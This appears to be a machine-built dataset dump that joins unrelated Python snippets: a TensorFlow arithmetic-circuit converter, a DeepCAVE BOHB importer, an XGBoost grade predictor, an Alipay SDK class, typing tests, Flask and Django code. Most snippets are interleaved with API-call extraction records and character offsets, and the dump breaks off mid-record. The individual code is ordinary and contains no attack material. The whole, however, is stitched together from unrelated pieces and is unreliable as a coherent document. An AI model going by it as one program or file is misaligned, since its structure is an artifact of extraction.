[((227, 243), 'argparse.ArgumentParser', 'ArgumentParser', ([], {}), '()\n', (241, 243), False, 'from argparse import ArgumentParser\n'), ((561, 592), 'util.srcAddressForDst', 'srcAddressForDst', (['args.remoteIP'], {}), '(args.remoteIP)\n', (577, 592), False, 'from util import startTunnel, stopTunnel, addressesForInterface, srcAddressForDst\n'), ((970, 1014), 'util.startTunnel', 'startTunnel', (['args.remoteIP', 'src', 'args.bridge'], {}), '(args.remoteIP, src, args.bridge)\n', (981, 1014), False, 'from util import startTunnel, stopTunnel, addressesForInterface, srcAddressForDst\n'), ((401, 436), 'socket.gethostbyname', 'socket.gethostbyname', (['args.remoteIP'], {}), '(args.remoteIP)\n', (421, 436), False, 'import socket\n'), ((851, 950), 'logging.error', 'logging.error', (['"""Could not connect to server: HTTP {}: {}"""', 'response.status_code', 'response.text'], {}), "('Could not connect to server: HTTP {}: {}', response.\n status_code, response.text)\n", (864, 950), False, 'import logging\n'), ((1032, 1046), 'signal.pause', 'signal.pause', ([], {}), '()\n', (1044, 1046), False, 'import signal\n'), ((1085, 1110), 'util.stopTunnel', 'stopTunnel', (['args.remoteIP'], {}), '(args.remoteIP)\n', (1095, 1110), False, 'from util import startTunnel, stopTunnel, addressesForInterface, srcAddressForDst\n')]
|
## This file converts ac to tensorflow graph
## It takes as input a pickle file which contains the AC as a dictionary
## Each value in the dictionary is node_obj class object from Nimish's graph_analysis project
import tensorflow as tf
import pickle
import networkx as nx
import random
import numpy as np
def load_ac(ac):
    """Load the pickled AC node dictionary and its networkx counterpart.

    Parameters
    ----------
    ac : str
        Benchmark name; used to build both pickle file paths.

    Returns
    -------
    tuple
        (graph, graph_nx) — the node-object dict and the networkx graph.

    NOTE(review): pickle.load executes arbitrary code if these files are
    untrusted; assumed to be locally generated artifacts.
    """
    fname = './gr_files/' + ac + '.p'
    with open(fname, 'rb') as fp:
        # latin1 lets Python 3 unpickle Python-2-era pickles.
        graph = pickle.load(fp, encoding='latin1')
    # The 'with' block closes the file; the original's explicit fp.close()
    # inside it was redundant and has been removed.
    fname = './gr_nx_files/' + ac + '_gr.p_nx5ALL_0.00.05.03333_33322_332222_3222222_22222222'
    with open(fname, 'rb') as fp:
        graph_nx = pickle.load(fp)
    return graph, graph_nx
def ac_to_tf(ac, batch_size):
    """
    Reads pickled ac, converts it to tf graph.

    Walks the AC in topological order, creating a TF variable/constant for
    each leaf and a randomly chosen multiply/add op for each internal node.
    Returns (tf_root, num_ops) where tf_root is the tensor for the AC root
    and num_ops counts the internal operations created.
    """
    print('Constructing TF graph from AC')
    graph, graph_nx= load_ac(ac)
    #-- Convert ac to tf
    tf_dict= {}
    root= None
    num_ops= 0
    print("total node in AC:", graph_nx.number_of_nodes())
    weight_cnt= 0
    ind_cnt= 0
    for node in nx.topological_sort(graph_nx):
        # print(node, end=',')
        obj= graph[node]
        if obj.is_leaf():
            assert len(list(graph_nx.in_edges(node))) == 0
            # if len(list(graph_nx.in_edges(node))) == 0: # Leaf node
            # curr= tf.Variable(tf.random_normal([batch_size,batch_size]), name= 'in')
            # curr= tf.Variable(tf.convert_to_tensor([[[random.random()]*batch_size]*batch_size]), name= 'in')
            # curr= tf.Variable(tf.convert_to_tensor(np.full((batch_size, batch_size), random.random())), name= 'in')
            # Classify the leaf as indicator vs weight by inspecting its
            # sibling leaves: a leaf whose sibling is a weight is treated as
            # an indicator and vice versa.
            leaf_type= None
            IND= 0
            WEIGHT= 1
            siblings= set([ch for parent in obj.parent_key_list for ch in graph[parent].child_key_list])
            siblings= siblings - set([node])
            siblings_WEIGHT= False
            siblings_INDICATOR= False
            for sib in siblings:
                if graph[sib].is_weight():
                    siblings_WEIGHT= True
                if graph[sib].is_indicator():
                    siblings_INDICATOR= True
                if siblings_INDICATOR == True and siblings_WEIGHT == True:
                    break
            # assert not (siblings_WEIGHT == True and siblings_INDICATOR == True)
            if siblings_WEIGHT == True:
                leaf_type= IND
            elif siblings_INDICATOR == True:
                leaf_type= WEIGHT
            if leaf_type== None:
                # Fallback heuristic: single-parent leaves are weights.
                if len(obj.parent_key_list) == 1:
                    leaf_type= WEIGHT
                else:
                    leaf_type= IND
            if leaf_type == IND:
                ind_cnt += 1
                obj.leaf_type= obj.LEAF_TYPE_INDICATOR
                # Indicators become (1, batch_size) variables.
                curr= tf.Variable(tf.convert_to_tensor(np.full((1, batch_size), random.random(), dtype= np.float32)), name= 'ind')
            elif leaf_type== WEIGHT:
                weight_cnt += 1
                obj.leaf_type= obj.LEAF_TYPE_WEIGHT
                # Weights become scalar constants.
                curr= tf.constant([random.random()], name= 'weight')
            else:
                assert 0
        else: # sum or product
            # assert len(obj.child_key_list) == 2, "AC should be binary"
            # ch_0= tf_dict[obj.child_key_list[0]]
            # ch_1= tf_dict[obj.child_key_list[1]]
            #
            # if obj.operation_type == 1:
            #   curr= tf.multiply(ch_0, ch_1, 'mul')
            # elif obj.operation_type == 2:
            #   curr= tf.add(ch_0, ch_1, 'mul')
            # else:
            #   assert 0
            #
            # if len(obj.parent_key_list) == 0:
            #   assert root== None
            #   root= node
            #   tf_root= curr
            children= list(graph_nx.predecessors(node))
            parents= list(graph_nx.successors(node))
            ch_0= tf_dict[children[0]]
            ch_1= tf_dict[children[1]]
            # randint(0, 2) is truthy 2/3 of the time, so roughly 2/3 of the
            # internal ops are multiplies and 1/3 are adds.
            if random.randint(0,2):
                curr= tf.multiply(ch_0, ch_1, 'mul')
            else:
                curr= tf.add(ch_0, ch_1, 'add')
            if len(parents) == 0:
                # A node with no successors is the AC root.
                assert root == None
                root= node
                tf_root= curr
            num_ops += 1
        tf_dict[node]= curr
    print("Indicator cnt, Weight Cnt:", ind_cnt, weight_cnt)
    assert root != None
    assert len(tf_dict) == len(graph_nx)
    return tf_root, num_ops
|
[
"random.randint",
"networkx.topological_sort",
"tensorflow.add",
"tensorflow.multiply",
"random.random",
"pickle.load"
] |
[((979, 1008), 'networkx.topological_sort', 'nx.topological_sort', (['graph_nx'], {}), '(graph_nx)\n', (998, 1008), True, 'import networkx as nx\n'), ((409, 443), 'pickle.load', 'pickle.load', (['fp'], {'encoding': '"""latin1"""'}), "(fp, encoding='latin1')\n", (420, 443), False, 'import pickle\n'), ((601, 616), 'pickle.load', 'pickle.load', (['fp'], {}), '(fp)\n', (612, 616), False, 'import pickle\n'), ((3442, 3462), 'random.randint', 'random.randint', (['(0)', '(2)'], {}), '(0, 2)\n', (3456, 3462), False, 'import random\n'), ((3479, 3509), 'tensorflow.multiply', 'tf.multiply', (['ch_0', 'ch_1', '"""mul"""'], {}), "(ch_0, ch_1, 'mul')\n", (3490, 3509), True, 'import tensorflow as tf\n'), ((3538, 3563), 'tensorflow.add', 'tf.add', (['ch_0', 'ch_1', '"""add"""'], {}), "(ch_0, ch_1, 'add')\n", (3544, 3563), True, 'import tensorflow as tf\n'), ((2517, 2532), 'random.random', 'random.random', ([], {}), '()\n', (2530, 2532), False, 'import random\n'), ((2694, 2709), 'random.random', 'random.random', ([], {}), '()\n', (2707, 2709), False, 'import random\n')]
|
import os
import json
import glob
import pandas as pd
from typing import Dict, Type, Any
import ConfigSpace
from deepcave.runs.run import Status
from deepcave.runs.converters.converter import Converter
from deepcave.runs.run import Run
from deepcave.runs.objective import Objective
from deepcave.utils.hash import file_to_hash
class BOHB(Converter):
    """Converter that imports BOHB (hpbandster) result directories."""
    @staticmethod
    def name() -> str:
        # Display name of this converter.
        return "BOHB"
    def get_run_id(self, working_dir, run_name) -> str:
        """
        The id from the files in the current working_dir/run_name/*. For example, history.json could be read and hashed.
        Idea behind: If id changed, then we have to update cached trials.
        """
        # Use hash of history.json as id
        # NOTE(review): the comment/docstring mention history.json but the
        # hash is actually taken over results.json — confirm intent.
        return file_to_hash(os.path.join(working_dir, run_name, "results.json"))
    def get_run(self, working_dir, run_name) -> Run:
        """
        Based on working_dir/run_name/*, return a new trials object.
        """
        base = os.path.join(working_dir, run_name)
        # Read configspace
        from ConfigSpace.read_and_write import json as cs_json
        with open(os.path.join(base, 'configspace.json'), 'r') as f:
            configspace = cs_json.read(f.read())
        # Read objectives
        # We have to define it ourselves, because we don't know the type of the objective
        # Only lock lower
        objective = Objective("Cost", lower=0)
        run = Run(
            configspace=configspace,
            objectives=objective,
            meta={}
        )
        from hpbandster.core.result import logged_results_to_HBS_result
        bohb = logged_results_to_HBS_result(base)
        first_starttime = None
        for bohb_run in bohb.get_all_runs():
            times = bohb_run.time_stamps
            starttime = times["started"]
            endtime = times["finished"]
            if first_starttime is None:
                first_starttime = starttime
            # Normalize timestamps relative to the first run's start.
            starttime = starttime - first_starttime
            endtime = endtime - first_starttime
            cost = bohb_run.loss
            budget = bohb_run.budget
            config = bohb_run.info["config"]
            # Convert str to dict
            config = json.loads(config)
            origin = None
            additional = {}
            status = bohb_run.info["state"]
            # QUEUED, RUNNING, CRASHED, REVIEW, TERMINATED, COMPLETED, SUCCESS
            if "SUCCESS" in status or "TERMINATED" in status or "COMPLETED" in status:
                status = Status.SUCCESS
            elif "RUNNING" in status or "QUEUED" in status or "REVIEW" in status:
                status = Status.RUNNING
            else:
                status = Status.CRASHED
            if status != Status.SUCCESS:
                # We don't want cost included which are failed
                cost = None
            run.add(
                costs=[cost],  # Having only single objective here
                config=config,
                budget=budget,
                start_time=starttime,
                end_time=endtime,
                status=status,
                origin=origin,
                additional=additional,
            )
        # Save for sanity check
        # run.save(os.path.join(base, "run"))
        return run
|
[
"deepcave.runs.objective.Objective",
"json.loads",
"deepcave.runs.run.Run",
"os.path.join",
"hpbandster.core.result.logged_results_to_HBS_result"
] |
[((978, 1013), 'os.path.join', 'os.path.join', (['working_dir', 'run_name'], {}), '(working_dir, run_name)\n', (990, 1013), False, 'import os\n'), ((1386, 1412), 'deepcave.runs.objective.Objective', 'Objective', (['"""Cost"""'], {'lower': '(0)'}), "('Cost', lower=0)\n", (1395, 1412), False, 'from deepcave.runs.objective import Objective\n'), ((1428, 1487), 'deepcave.runs.run.Run', 'Run', ([], {'configspace': 'configspace', 'objectives': 'objective', 'meta': '{}'}), '(configspace=configspace, objectives=objective, meta={})\n', (1431, 1487), False, 'from deepcave.runs.run import Run\n'), ((1622, 1656), 'hpbandster.core.result.logged_results_to_HBS_result', 'logged_results_to_HBS_result', (['base'], {}), '(base)\n', (1650, 1656), False, 'from hpbandster.core.result import logged_results_to_HBS_result\n'), ((762, 813), 'os.path.join', 'os.path.join', (['working_dir', 'run_name', '"""results.json"""'], {}), "(working_dir, run_name, 'results.json')\n", (774, 813), False, 'import os\n'), ((2214, 2232), 'json.loads', 'json.loads', (['config'], {}), '(config)\n', (2224, 2232), False, 'import json\n'), ((1123, 1161), 'os.path.join', 'os.path.join', (['base', '"""configspace.json"""'], {}), "(base, 'configspace.json')\n", (1135, 1161), False, 'import os\n')]
|
import pandas as pd
from sklearn.preprocessing import MinMaxScaler
from xgboost import XGBRegressor
import os
from django.conf import settings
import numpy as np
from functools import lru_cache
RANDOM_STATE = 42
def get_path(course, file):
    # Build the path to a static data file for the given course, rooted at
    # the Django project directory (PROJECT_ROOT/../pandas_api/static/mit).
    return os.path.join(settings.PROJECT_ROOT, '..', 'pandas_api', 'static', 'mit', course, file)
@lru_cache(maxsize=32)
def load_data(course):
    """Load and join the per-course feature matrix X and final grades y.

    Returns (X, y): X drops 'final_grade', 'nproblem_check' and 'username';
    y is the 'final_grade' column.  Results are cached per course.
    """
    # Loading the final grade and the student list
    final_grades = pd.read_csv(get_path(course, 'final_grades.csv'), index_col='user_id')
    course_feature = pd.read_csv(get_path(course, 'coursewised_feature.csv'),
                                 index_col='user_id').fillna(0)
    # cg = pd.read_csv(get_path(course, 'chapter_grades.csv'))
    # cg = cg.pivot(index='user_id', columns='chapter_mid', values='chgrade').fillna(0)
    cv = pd.read_csv(get_path(course, 'chapter_videos.csv'))
    cv = cv.pivot(index='user_id', columns='chapter_name', values='video_count').fillna(0)
    # note that the above dfs have same index 'user_id'
    # # merge the course_videos and course_grades
    # features = \
    #     cg.join(cv, on=None, how='outer', lsuffix='_grade', rsuffix='_video_count').fillna(0)
    features = cv
    # full outer join on cv.user_id = course_feature.user_id
    features = features.join(course_feature, how='outer').fillna(0)
    # final_grades is y-data => left outer join on final_grades.user_id = features.user_id
    df = final_grades.join(features, how='left').fillna(0)
    # exclude the 'final_grade' and 'nproblem_check'
    X = df.drop(['final_grade', 'nproblem_check', 'username'], axis=1)
    y = df['final_grade']
    return X, y
def get_user_chapter_grades(course, user_id):
    """Return one user's per-chapter grades as chart-ready dicts.

    Reads chapter_grade.csv (indexed by user_id/chapter_id) and produces
    [{"name": "Chapter <id>", "score": <grade>}, ...].
    """
    grades_df = pd.read_csv(get_path(course, 'chapter_grade.csv'), index_col=['user_id', 'chapter_id'])
    result = []
    # Series.iteritems() was removed in pandas 2.0; items() is the
    # long-standing equivalent.  Also avoid re-using the DataFrame's name
    # as the loop variable, which the original shadowed.
    for chapter_id, grade in grades_df.loc[user_id]['chapter_grade'].items():
        result.append({"name": "Chapter " + str(chapter_id), "score": grade})
    return result
def main():
    """Train (or load) a model for one hard-coded course and print its
    predictions over the full feature matrix — a manual smoke test."""
    course = 'VJx__VJx_2__3T2016'
    # NOTE(review): unlike predict(), this saves to a bare 'model.xgb' in
    # the CWD rather than a per-course path via get_path() — confirm.
    filename = 'model.xgb'
    X, y = load_data(course)
    # Normalization
    scaler = MinMaxScaler()
    scaler.fit(X)
    X = scaler.transform(X)
    model = XGBRegressor()
    if os.path.isfile(filename):
        model.load_model(filename)
    else:
        model.fit(X, y)
        model.save_model(filename)
    y_ = model.predict(X)
    print(y_)
# Per-course caches so repeated predictions skip model/scaler rebuilds.
model_cache = {}
data_transformer = {}

def predict(course_code, user_id):
    """Predict a user's final exam score plus the class-wide distribution.

    Returns a dict with the histogram of predicted scores for the whole
    class, the user's per-chapter grades, and the user's predicted final
    exam score.
    """
    filename = get_path(course_code, '%s_model.xgb' % course_code)
    X, y = load_data(course_code)
    user_X = X.loc[user_id]
    # Fit (and cache) a scaler on the full, raw feature matrix.
    if course_code not in data_transformer:
        scaler = MinMaxScaler()
        scaler.fit(X)
        data_transformer[course_code] = scaler
    scaler = data_transformer[course_code]
    # Scale exactly once.  The original scaled X inside the training branch
    # and then again afterwards, double-scaling freshly trained data.
    X_scaled = scaler.transform(X)
    if course_code not in model_cache:
        model = XGBRegressor()
        if os.path.isfile(filename):
            model.load_model(filename)
        else:
            model.fit(X_scaled, y)
            model.save_model(filename)
        model_cache[course_code] = model
    model = model_cache[course_code]
    y_ = model.predict(X_scaled)
    hist, bin_edges = np.histogram(y_, bins=10, range=[0, 1])
    # The user's row must go through the same scaler the model was trained
    # with; the original predicted on the raw, unscaled row.
    user_scaled = scaler.transform(np.asarray(user_X).reshape(1, -1))
    return {
        "classFinalExamDistribution": hist.tolist(),
        "myChapterScore": get_user_chapter_grades(course_code, user_id),
        "myPredictedFinalExamScore": float(model.predict(user_scaled)[0])
    }
# Allow running this module directly as a quick smoke test.
if __name__ == '__main__':
    main()
|
[
"sklearn.preprocessing.MinMaxScaler",
"os.path.isfile",
"numpy.histogram",
"xgboost.XGBRegressor",
"functools.lru_cache",
"os.path.join"
] |
[((344, 365), 'functools.lru_cache', 'lru_cache', ([], {'maxsize': '(32)'}), '(maxsize=32)\n', (353, 365), False, 'from functools import lru_cache\n'), ((254, 344), 'os.path.join', 'os.path.join', (['settings.PROJECT_ROOT', '""".."""', '"""pandas_api"""', '"""static"""', '"""mit"""', 'course', 'file'], {}), "(settings.PROJECT_ROOT, '..', 'pandas_api', 'static', 'mit',\n course, file)\n", (266, 344), False, 'import os\n'), ((2171, 2185), 'sklearn.preprocessing.MinMaxScaler', 'MinMaxScaler', ([], {}), '()\n', (2183, 2185), False, 'from sklearn.preprocessing import MinMaxScaler\n'), ((2245, 2259), 'xgboost.XGBRegressor', 'XGBRegressor', ([], {}), '()\n', (2257, 2259), False, 'from xgboost import XGBRegressor\n'), ((2267, 2291), 'os.path.isfile', 'os.path.isfile', (['filename'], {}), '(filename)\n', (2281, 2291), False, 'import os\n'), ((3275, 3314), 'numpy.histogram', 'np.histogram', (['y_'], {'bins': '(10)', 'range': '[0, 1]'}), '(y_, bins=10, range=[0, 1])\n', (3287, 3314), True, 'import numpy as np\n'), ((2728, 2742), 'sklearn.preprocessing.MinMaxScaler', 'MinMaxScaler', ([], {}), '()\n', (2740, 2742), False, 'from sklearn.preprocessing import MinMaxScaler\n'), ((2911, 2925), 'xgboost.XGBRegressor', 'XGBRegressor', ([], {}), '()\n', (2923, 2925), False, 'from xgboost import XGBRegressor\n'), ((2937, 2961), 'os.path.isfile', 'os.path.isfile', (['filename'], {}), '(filename)\n', (2951, 2961), False, 'import os\n')]
|
import json

# Demonstrate serialising a Python mapping to a JSON string: note that
# True becomes "true" in the output.
pythonValueDic = dict(
    name='zhangsan',
    isCat=True,
    miceCaught=0,
)
data = json.dumps(pythonValueDic)
print(data)
"""
{"name": "zhangsan", "isCat": true, "miceCaught": 0}
"""
|
[
"json.dumps"
] |
[((105, 131), 'json.dumps', 'json.dumps', (['pythonValueDic'], {}), '(pythonValueDic)\n', (115, 131), False, 'import json\n')]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.MultiCurrencyMoneyOpenApi import MultiCurrencyMoneyOpenApi
class ApInvoiceBillLinkOrderRequest(object):
def __init__(self):
self._amt = None
self._daily_bill_dimension = None
self._monthly_bill_no = None
@property
def amt(self):
return self._amt
@amt.setter
def amt(self, value):
if isinstance(value, MultiCurrencyMoneyOpenApi):
self._amt = value
else:
self._amt = MultiCurrencyMoneyOpenApi.from_alipay_dict(value)
@property
def daily_bill_dimension(self):
return self._daily_bill_dimension
@daily_bill_dimension.setter
def daily_bill_dimension(self, value):
self._daily_bill_dimension = value
@property
def monthly_bill_no(self):
return self._monthly_bill_no
@monthly_bill_no.setter
def monthly_bill_no(self, value):
self._monthly_bill_no = value
def to_alipay_dict(self):
params = dict()
if self.amt:
if hasattr(self.amt, 'to_alipay_dict'):
params['amt'] = self.amt.to_alipay_dict()
else:
params['amt'] = self.amt
if self.daily_bill_dimension:
if hasattr(self.daily_bill_dimension, 'to_alipay_dict'):
params['daily_bill_dimension'] = self.daily_bill_dimension.to_alipay_dict()
else:
params['daily_bill_dimension'] = self.daily_bill_dimension
if self.monthly_bill_no:
if hasattr(self.monthly_bill_no, 'to_alipay_dict'):
params['monthly_bill_no'] = self.monthly_bill_no.to_alipay_dict()
else:
params['monthly_bill_no'] = self.monthly_bill_no
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = ApInvoiceBillLinkOrderRequest()
if 'amt' in d:
o.amt = d['amt']
if 'daily_bill_dimension' in d:
o.daily_bill_dimension = d['daily_bill_dimension']
if 'monthly_bill_no' in d:
o.monthly_bill_no = d['monthly_bill_no']
return o
|
[
"alipay.aop.api.domain.MultiCurrencyMoneyOpenApi.MultiCurrencyMoneyOpenApi.from_alipay_dict"
] |
[((601, 650), 'alipay.aop.api.domain.MultiCurrencyMoneyOpenApi.MultiCurrencyMoneyOpenApi.from_alipay_dict', 'MultiCurrencyMoneyOpenApi.from_alipay_dict', (['value'], {}), '(value)\n', (643, 650), False, 'from alipay.aop.api.domain.MultiCurrencyMoneyOpenApi import MultiCurrencyMoneyOpenApi\n')]
|
# This sample tests the type checker's handling of ParamSpec
# and Concatenate as described in PEP 612.
from typing import Callable, Concatenate, ParamSpec, TypeVar
P = ParamSpec("P")
R = TypeVar("R")
class Request:
...
def with_request(f: Callable[Concatenate[Request, P], R]) -> Callable[P, R]:
def inner(*args: P.args, **kwargs: P.kwargs) -> R:
return f(Request(), *args, **kwargs)
return inner
@with_request
def takes_int_str(request: Request, x: int, y: str) -> int:
# use request
return x + 7
takes_int_str(1, "A")
# This should generate an error because the first arg
# is the incorrect type.
takes_int_str("B", "A")
# This should generate an error because there are too
# many parameters.
takes_int_str(1, "A", 2)
# This should generate an error because a ParamSpec can appear
# only within the last type arg for Concatenate
def decorator1(f: Callable[Concatenate[P, P], int]) -> Callable[P, int]:
...
# This should generate an error because the last type arg
# for Concatenate should be a ParamSpec.
def decorator2(f: Callable[Concatenate[int, int], int]) -> Callable[P, int]:
...
# This should generate an error because Concatenate is missing
# its type arguments.
def decorator3(f: Callable[Concatenate, int]) -> Callable[P, int]:
...
def decorator4(func: Callable[P, None]) -> Callable[Concatenate[int, P], None]:
def wrapper(x: int, /, *args: P.args, **kwargs: P.kwargs) -> None:
...
return wrapper
def func1(func: Callable[Concatenate[int, P], None]) -> Callable[P, None]:
...
def func2(a: int, b: str, c: str) -> None:
...
def func3(a: int, /, b: str, c: str) -> None:
...
def func4(a: int, b: str, /, c: str) -> None:
...
v1 = func1(func2)
reveal_type(v1, expected_text="(b: str, c: str) -> None")
v2 = func1(func3)
reveal_type(v2, expected_text="(b: str, c: str) -> None")
v3 = func1(func4)
reveal_type(v3, expected_text="(b: str, /, c: str) -> None")
def func5(__fn: Callable[P, R], *args: P.args, **kwargs: P.kwargs) -> R:
...
def func6(name: str, *args: str):
...
v5 = func5(func6, "a", "b", "c")
# This should generate an error because 1 isn't assignable to str.
v6 = func5(func6, "a", "b", "c", 1)
def func7(name: str, **kwargs: str):
...
v7 = func5(func7, "a", b="b", c="c")
# This should generate an error because 1 isn't assignable to str.
v8 = func5(func7, "a", b="b", c=1)
|
[
"typing.ParamSpec",
"typing.TypeVar"
] |
[((171, 185), 'typing.ParamSpec', 'ParamSpec', (['"""P"""'], {}), "('P')\n", (180, 185), False, 'from typing import Callable, Concatenate, ParamSpec, TypeVar\n'), ((190, 202), 'typing.TypeVar', 'TypeVar', (['"""R"""'], {}), "('R')\n", (197, 202), False, 'from typing import Callable, Concatenate, ParamSpec, TypeVar\n')]
|
import pkg_resources
import unittest
from grip.model import Dependency, Version, Package
class TestDependency(unittest.TestCase):
def test_ctor_str(self):
dep = Dependency('django==2.0')
self.assertEqual(dep.name, 'django')
self.assertTrue(dep.matches_version('2.0'))
self.assertFalse(dep.matches_version('2.1'))
def test_ctor_pkgr_req(self):
req = pkg_resources.Requirement('django==2.0')
dep = Dependency(req)
self.assertEqual(dep.name, 'django')
self.assertTrue(dep.matches_version('2.0'))
self.assertFalse(dep.matches_version('2.1'))
def test_ctor_err(self):
with self.assertRaises(TypeError):
Dependency(2)
def test_matching(self):
dep = Dependency('celery>=3,<5')
self.assertFalse(dep.matches_version('2.7'))
self.assertTrue(dep.matches_version(Version('3.0')))
self.assertTrue(dep.matches_version('3.2'))
self.assertFalse(dep.matches_version('5'))
def test_compare(self):
a = Dependency('celery>=3,<5')
b = Dependency('django==2')
self.assertGreater(b, a)
self.assertLess(a, b)
def test_exact(self):
a = Dependency('django==2')
b = Dependency.exact(Package('django' ,'2'))
self.assertEqual(a.name, b.name)
self.assertEqual(a.specifier, b.specifier)
def test_str(self):
dep = Dependency.exact(Package('django' ,'2'))
self.assertEqual(str(dep), 'django==2')
dep = Dependency('django==2')
dep.url = '[email protected]:a/b.git'
self.assertEqual(str(dep), dep.url + '#egg=django==2')
|
[
"grip.model.Version",
"grip.model.Package",
"grip.model.Dependency",
"pkg_resources.Requirement"
] |
[((175, 200), 'grip.model.Dependency', 'Dependency', (['"""django==2.0"""'], {}), "('django==2.0')\n", (185, 200), False, 'from grip.model import Dependency, Version, Package\n'), ((400, 440), 'pkg_resources.Requirement', 'pkg_resources.Requirement', (['"""django==2.0"""'], {}), "('django==2.0')\n", (425, 440), False, 'import pkg_resources\n'), ((455, 470), 'grip.model.Dependency', 'Dependency', (['req'], {}), '(req)\n', (465, 470), False, 'from grip.model import Dependency, Version, Package\n'), ((764, 790), 'grip.model.Dependency', 'Dependency', (['"""celery>=3,<5"""'], {}), "('celery>=3,<5')\n", (774, 790), False, 'from grip.model import Dependency, Version, Package\n'), ((1049, 1075), 'grip.model.Dependency', 'Dependency', (['"""celery>=3,<5"""'], {}), "('celery>=3,<5')\n", (1059, 1075), False, 'from grip.model import Dependency, Version, Package\n'), ((1088, 1111), 'grip.model.Dependency', 'Dependency', (['"""django==2"""'], {}), "('django==2')\n", (1098, 1111), False, 'from grip.model import Dependency, Version, Package\n'), ((1214, 1237), 'grip.model.Dependency', 'Dependency', (['"""django==2"""'], {}), "('django==2')\n", (1224, 1237), False, 'from grip.model import Dependency, Version, Package\n'), ((1525, 1548), 'grip.model.Dependency', 'Dependency', (['"""django==2"""'], {}), "('django==2')\n", (1535, 1548), False, 'from grip.model import Dependency, Version, Package\n'), ((706, 719), 'grip.model.Dependency', 'Dependency', (['(2)'], {}), '(2)\n', (716, 719), False, 'from grip.model import Dependency, Version, Package\n'), ((1267, 1289), 'grip.model.Package', 'Package', (['"""django"""', '"""2"""'], {}), "('django', '2')\n", (1274, 1289), False, 'from grip.model import Dependency, Version, Package\n'), ((1439, 1461), 'grip.model.Package', 'Package', (['"""django"""', '"""2"""'], {}), "('django', '2')\n", (1446, 1461), False, 'from grip.model import Dependency, Version, Package\n'), ((888, 902), 'grip.model.Version', 'Version', (['"""3.0"""'], {}), 
"('3.0')\n", (895, 902), False, 'from grip.model import Dependency, Version, Package\n')]
|
from flask import Blueprint, Response, request, jsonify
from sqlalchemy import func
from application.database import global_db
from application.helpers import crossdomain, gen_csv_response
from core.monitoring.models import SENSOR_CLASS_MAP
sensor_stat_api_pages = Blueprint('sensor_stat_api', __name__
, template_folder='templates', static_folder='static')
@sensor_stat_api_pages.route("/avg/<string:sensor>")
@crossdomain(origin='*')
def get_sensor_stat(sensor: str) -> Response:
try:
t_from = request.args["t_from"]
t_to = request.args["t_to"]
sensor_class = SENSOR_CLASS_MAP[sensor]
except KeyError as e:
raise e
query = (global_db.session.query(
sensor_class.time
, func.count(sensor_class.time).label("working_nodes")
, func.avg(sensor_class.avg).label("avg"))
.filter(sensor_class.time > t_from)
.filter(sensor_class.time < t_to)
.group_by(sensor_class.time)
.order_by(sensor_class.time))
return gen_csv_response(query.column_descriptions, query.all())
|
[
"sqlalchemy.func.avg",
"flask.Blueprint",
"sqlalchemy.func.count",
"application.helpers.crossdomain"
] |
[((267, 362), 'flask.Blueprint', 'Blueprint', (['"""sensor_stat_api"""', '__name__'], {'template_folder': '"""templates"""', 'static_folder': '"""static"""'}), "('sensor_stat_api', __name__, template_folder='templates',\n static_folder='static')\n", (276, 362), False, 'from flask import Blueprint, Response, request, jsonify\n'), ((416, 439), 'application.helpers.crossdomain', 'crossdomain', ([], {'origin': '"""*"""'}), "(origin='*')\n", (427, 439), False, 'from application.helpers import crossdomain, gen_csv_response\n'), ((695, 724), 'sqlalchemy.func.count', 'func.count', (['sensor_class.time'], {}), '(sensor_class.time)\n', (705, 724), False, 'from sqlalchemy import func\n'), ((753, 779), 'sqlalchemy.func.avg', 'func.avg', (['sensor_class.avg'], {}), '(sensor_class.avg)\n', (761, 779), False, 'from sqlalchemy import func\n')]
|
"""docstring for pollsapp tests."""
import datetime
from django.test import TestCase, Client
from django.utils import timezone
from django.urls import reverse
from .models import Question
client = Client()
def create_question(question_text, days):
"""Create a question and add no. of days to now."""
time = timezone.now() + datetime.timedelta(days=days)
return Question.objects.create(question_text=question_text, pub_date=time)
class QuestionModelTests(TestCase):
"""docstring for QuestionModelTests."""
def test_was_published_recently_with_future_question(self):
"""Should return false."""
time = timezone.now() + datetime.timedelta(days=30)
future_question = Question(pub_date=time)
self.assertIs(future_question.was_published_recently(), False)
def test_was_published_recently_with_old_question(self):
"""Func returns False for questions whose pub-date is older than 1 day."""
time = timezone.now() - datetime.timedelta(days=1, seconds=1)
old_question = Question(pub_date=time)
self.assertIs(old_question.was_published_recently(), False)
def test_was_published_recently_with_recent_question(self):
"""Func returns True for questions whose pub-date is within the last day."""
time = timezone.now() - datetime.timedelta(hours=23, minutes=59, seconds=59)
recent_question = Question(pub_date=time)
self.assertIs(recent_question.was_published_recently(), True)
class QuestionIndexViewTests(TestCase):
"""docstring for QuestionIndexViewTests."""
def test_no_questions(self):
"""Display appropriate msg if no questions exist."""
response = self.client.get(reverse('pollsapp:index'))
self.assertEqual(response.status_code, 200)
self.assertContains(response, "No polls are available")
self.assertQuerysetEqual(response.context['latest_question_list'], [])
def test_past_question(self):
"""Display questions with a pub_date in the past on the index page."""
create_question(question_text="Past question.", days=-30)
response = self.client.get(reverse('pollsapp:index'))
self.assertQuerysetEqual(
response.context['latest_question_list'],
['<Question: Past question.>']
)
def test_future_question(self):
"""Don't display questions with a pub_date in the future on the index page."""
create_question(question_text="Future question.", days=30)
response = self.client.get(reverse('pollsapp:index'))
self.assertContains(response, "No polls are available")
self.assertQuerysetEqual(response.context['latest_question_list'], [])
def test_future_question_and_past_question(self):
"""Display past questions even if both past and future questions exist."""
create_question(question_text="Past question.", days=-30)
create_question(question_text="Future question.", days=30)
response = self.client.get(reverse('pollsapp:index'))
self.assertQuerysetEqual(
response.context['latest_question_list'],
['<Question: Past question.>']
)
def test_two_past_questions(self):
"""The questions index page may display multiple questions."""
create_question(question_text="Past question 1.", days=-30)
create_question(question_text="Past question 2.", days=-5)
response = self.client.get(reverse('pollsapp:index'))
self.assertQuerysetEqual(
response.context['latest_question_list'],
['<Question: Past question 2.>', '<Question: Past question 1.>']
)
class QuestionDetailViewTests(object):
"""docstring for QuestionDetailViewTests."""
def test_future_question(self):
"""Return 404 if pub-date is in the future."""
future_question = create_question(
question_text='Future question.', days=30)
url = reverse("pollsapp:detail", args=(future_question.id,))
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
def test_past_question(self):
"""Question text should be displayed."""
past_question = create_question(question_text='Past question', days=-5)
url = reverse("pollsapp:detail", args=(past_question.id))
response = self.client.get(url)
self.assertContains(response, past_question.question_text)
|
[
